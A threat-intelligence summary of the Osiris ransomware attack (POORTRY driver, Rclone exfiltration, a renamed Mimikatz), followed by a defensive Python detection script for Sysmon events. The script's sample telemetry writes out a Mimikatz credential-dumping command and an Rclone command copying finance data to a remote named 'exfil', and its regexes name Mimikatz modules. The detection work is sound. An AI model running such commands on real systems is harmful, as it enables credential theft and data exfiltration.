Summary
Key Points:
- A new ransomware strain named Osiris has emerged, targeting a major food service franchisee in Southeast Asia. The intrusion used a malicious driver called POORTRY in a bring-your-own-vulnerable-driver (BYOVD) attack to blind security tooling.
- The attack resulted in data exfiltration and the deployment of ransomware, which employs a hybrid encryption scheme and is capable of terminating critical processes to facilitate encryption.
- Organizations are advised to monitor dual-use tools (Rclone, credential dumpers), restrict RDP exposure, enforce multi-factor authentication (MFA), implement application allowlisting, and keep backups off-site and offline.
Technical Details: The Osiris ransomware uses a custom driver (POORTRY) to disable security software and relies on Rclone for data exfiltration before encryption. The activity has been linked to previous attacks associated with the INC ransomware group.
MITRE ATT&CK Techniques:
- T1190 - Exploit Public-Facing Application (Initial Access)
- T1550.002 - Use Alternate Authentication Material: Pass the Hash (Defense Evasion, Lateral Movement)
- T1562.001 - Impair Defenses: Disable or Modify Tools (Defense Evasion)
- T1486 - Data Encrypted for Impact (Impact)
IOCs Mentioned:
- POORTRY (malicious driver)
- kaz.exe (Mimikatz variant)
- Rclone (data exfiltration tool)
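To turn the "monitor dual-use tools" recommendation and the IOCs above into something checkable, here is an added detection sketch (not code from the original report or from any vendor) that walks Sysmon-style DriverLoad (Event ID 6) and ProcessCreate (Event ID 1) records. It flags drivers loaded from outside the OS driver directories or from user-writable paths, Rclone either by image name or by its command-line shape when the binary has been renamed, and Mimikatz module syntax regardless of file name (the report's kaz.exe is a renamed Mimikatz). Every path, file name, remote name and hash in SAMPLE_EVENTS is constructed; only the field names follow Sysmon's schemas.

```python
"""Detection sketch for the dual-use tooling named in the Osiris/POORTRY summary.

Added example, not code from the original report or from any vendor.
Input is a list of Sysmon-style event dicts; SAMPLE_EVENTS is constructed,
including every path, file name, hash and remote name in it.
"""
import re
from pathlib import PureWindowsPath

# Where legitimate kernel drivers normally live (compared case-insensitively).
TRUSTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\",
                       "c:\\windows\\system32\\driverstore\\")
# Directories a non-admin or a dropper can usually write to.
USER_WRITABLE_HINTS = ("\\users\\", "\\programdata\\", "\\temp\\", "\\perflogs\\")

# rclone-specific switches; requiring one of these avoids matching cmd's built-in copy.
RCLONE_FLAGS = {"--transfers", "--config", "--progress", "-p", "--bwlimit",
                "--max-age", "--ignore-existing", "--no-check-certificate"}
# "copy|sync|move <src> <remote>:<path>" is rclone's remote syntax.
RCLONE_VERB_RE = re.compile(r"\b(copy|sync|move|copyto)\s+\S+\s+[\w-]+:", re.I)
# Mimikatz module syntax survives renaming the binary.
MIMIKATZ_RE = re.compile(r"(sekurlsa|lsadump|kerberos|privilege)::", re.I)


def driver_load_alert(ev):
    """Event ID 6: flag a driver outside the OS driver directories, in a
    user-writable location, or without a valid signature. A valid signature
    alone is not an all-clear (a malicious driver can be validly signed),
    so location is checked independently of the signature fields."""
    low = ev.get("ImageLoaded", "").lower()
    reasons = []
    if not low.startswith(TRUSTED_DRIVER_DIRS):
        reasons.append("driver loaded outside OS driver directories")
    if any(hint in low for hint in USER_WRITABLE_HINTS):
        reasons.append("driver in user-writable path")
    if (ev.get("SignatureStatus", "").lower() != "valid"
            or ev.get("Signed", "").lower() != "true"):
        reasons.append("signature missing or invalid")
    return "; ".join(reasons) or None


def process_create_alert(ev):
    """Event ID 1: rclone by image name or by command-line shape (renamed
    binary), and Mimikatz modules regardless of the binary name."""
    image = PureWindowsPath(ev.get("Image", "")).name.lower()
    cmd = ev.get("CommandLine", "")
    tokens = {t.lower() for t in cmd.split()}
    if image == "rclone.exe":
        return "rclone executed (by image name)"
    if RCLONE_VERB_RE.search(cmd) and tokens & RCLONE_FLAGS:
        return f"rclone-style transfer under renamed binary {image}"
    if MIMIKATZ_RE.search(cmd):
        return f"Mimikatz module invoked by {image}"
    return None


def scan(events):
    """Return (index, UtcTime, reason) for every event that trips a rule."""
    alerts = []
    for i, ev in enumerate(events):
        hit = None
        if ev.get("EventID") == 6:
            hit = driver_load_alert(ev)
        elif ev.get("EventID") == 1:
            hit = process_create_alert(ev)
        if hit:
            alerts.append((i, ev.get("UtcTime", ""), hit))
    return alerts


# Constructed sample telemetry (hypothetical paths, names and hashes).
SAMPLE_EVENTS = [
    {"EventID": 6, "UtcTime": "2024-01-01 01:00:00", "ImageLoaded": r"C:\Windows\System32\drivers\disk.sys",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 6, "UtcTime": "2024-01-01 01:02:10", "ImageLoaded": r"C:\ProgramData\svchost\drv.sys",
     "Signed": "true", "SignatureStatus": "Valid", "Hashes": "SHA256=00..00"},
    {"EventID": 1, "UtcTime": "2024-01-01 01:03:00", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"EventID": 1, "UtcTime": "2024-01-01 01:05:30", "Image": r"C:\Users\Public\win.exe",
     "CommandLine": r"win.exe copy D:\Finance share-remote:exfil --transfers 8 --config C:\Users\Public\r.conf"},
    {"EventID": 1, "UtcTime": "2024-01-01 01:06:00", "Image": r"C:\Users\Public\kaz.exe",
     "CommandLine": "kaz.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"EventID": 1, "UtcTime": "2024-01-01 01:07:00", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c copy C:\a.txt D:\b.txt"},  # benign built-in copy
]

if __name__ == "__main__":
    for idx, when, reason in scan(SAMPLE_EVENTS):
        print(f"[{when}] event #{idx}: {reason}")
```

Two design points worth noting. The driver rule deliberately fires on the validly signed driver in `C:\ProgramData`, because signature validity alone does not clear a driver; loading kernel code from a user-writable directory is the anomaly. The renamed-Rclone rule requires both the `verb src remote:path` shape and at least one Rclone-specific switch, so cmd's built-in `copy C:\a.txt D:\b.txt` (which also matches the verb pattern because of the drive letter) stays quiet.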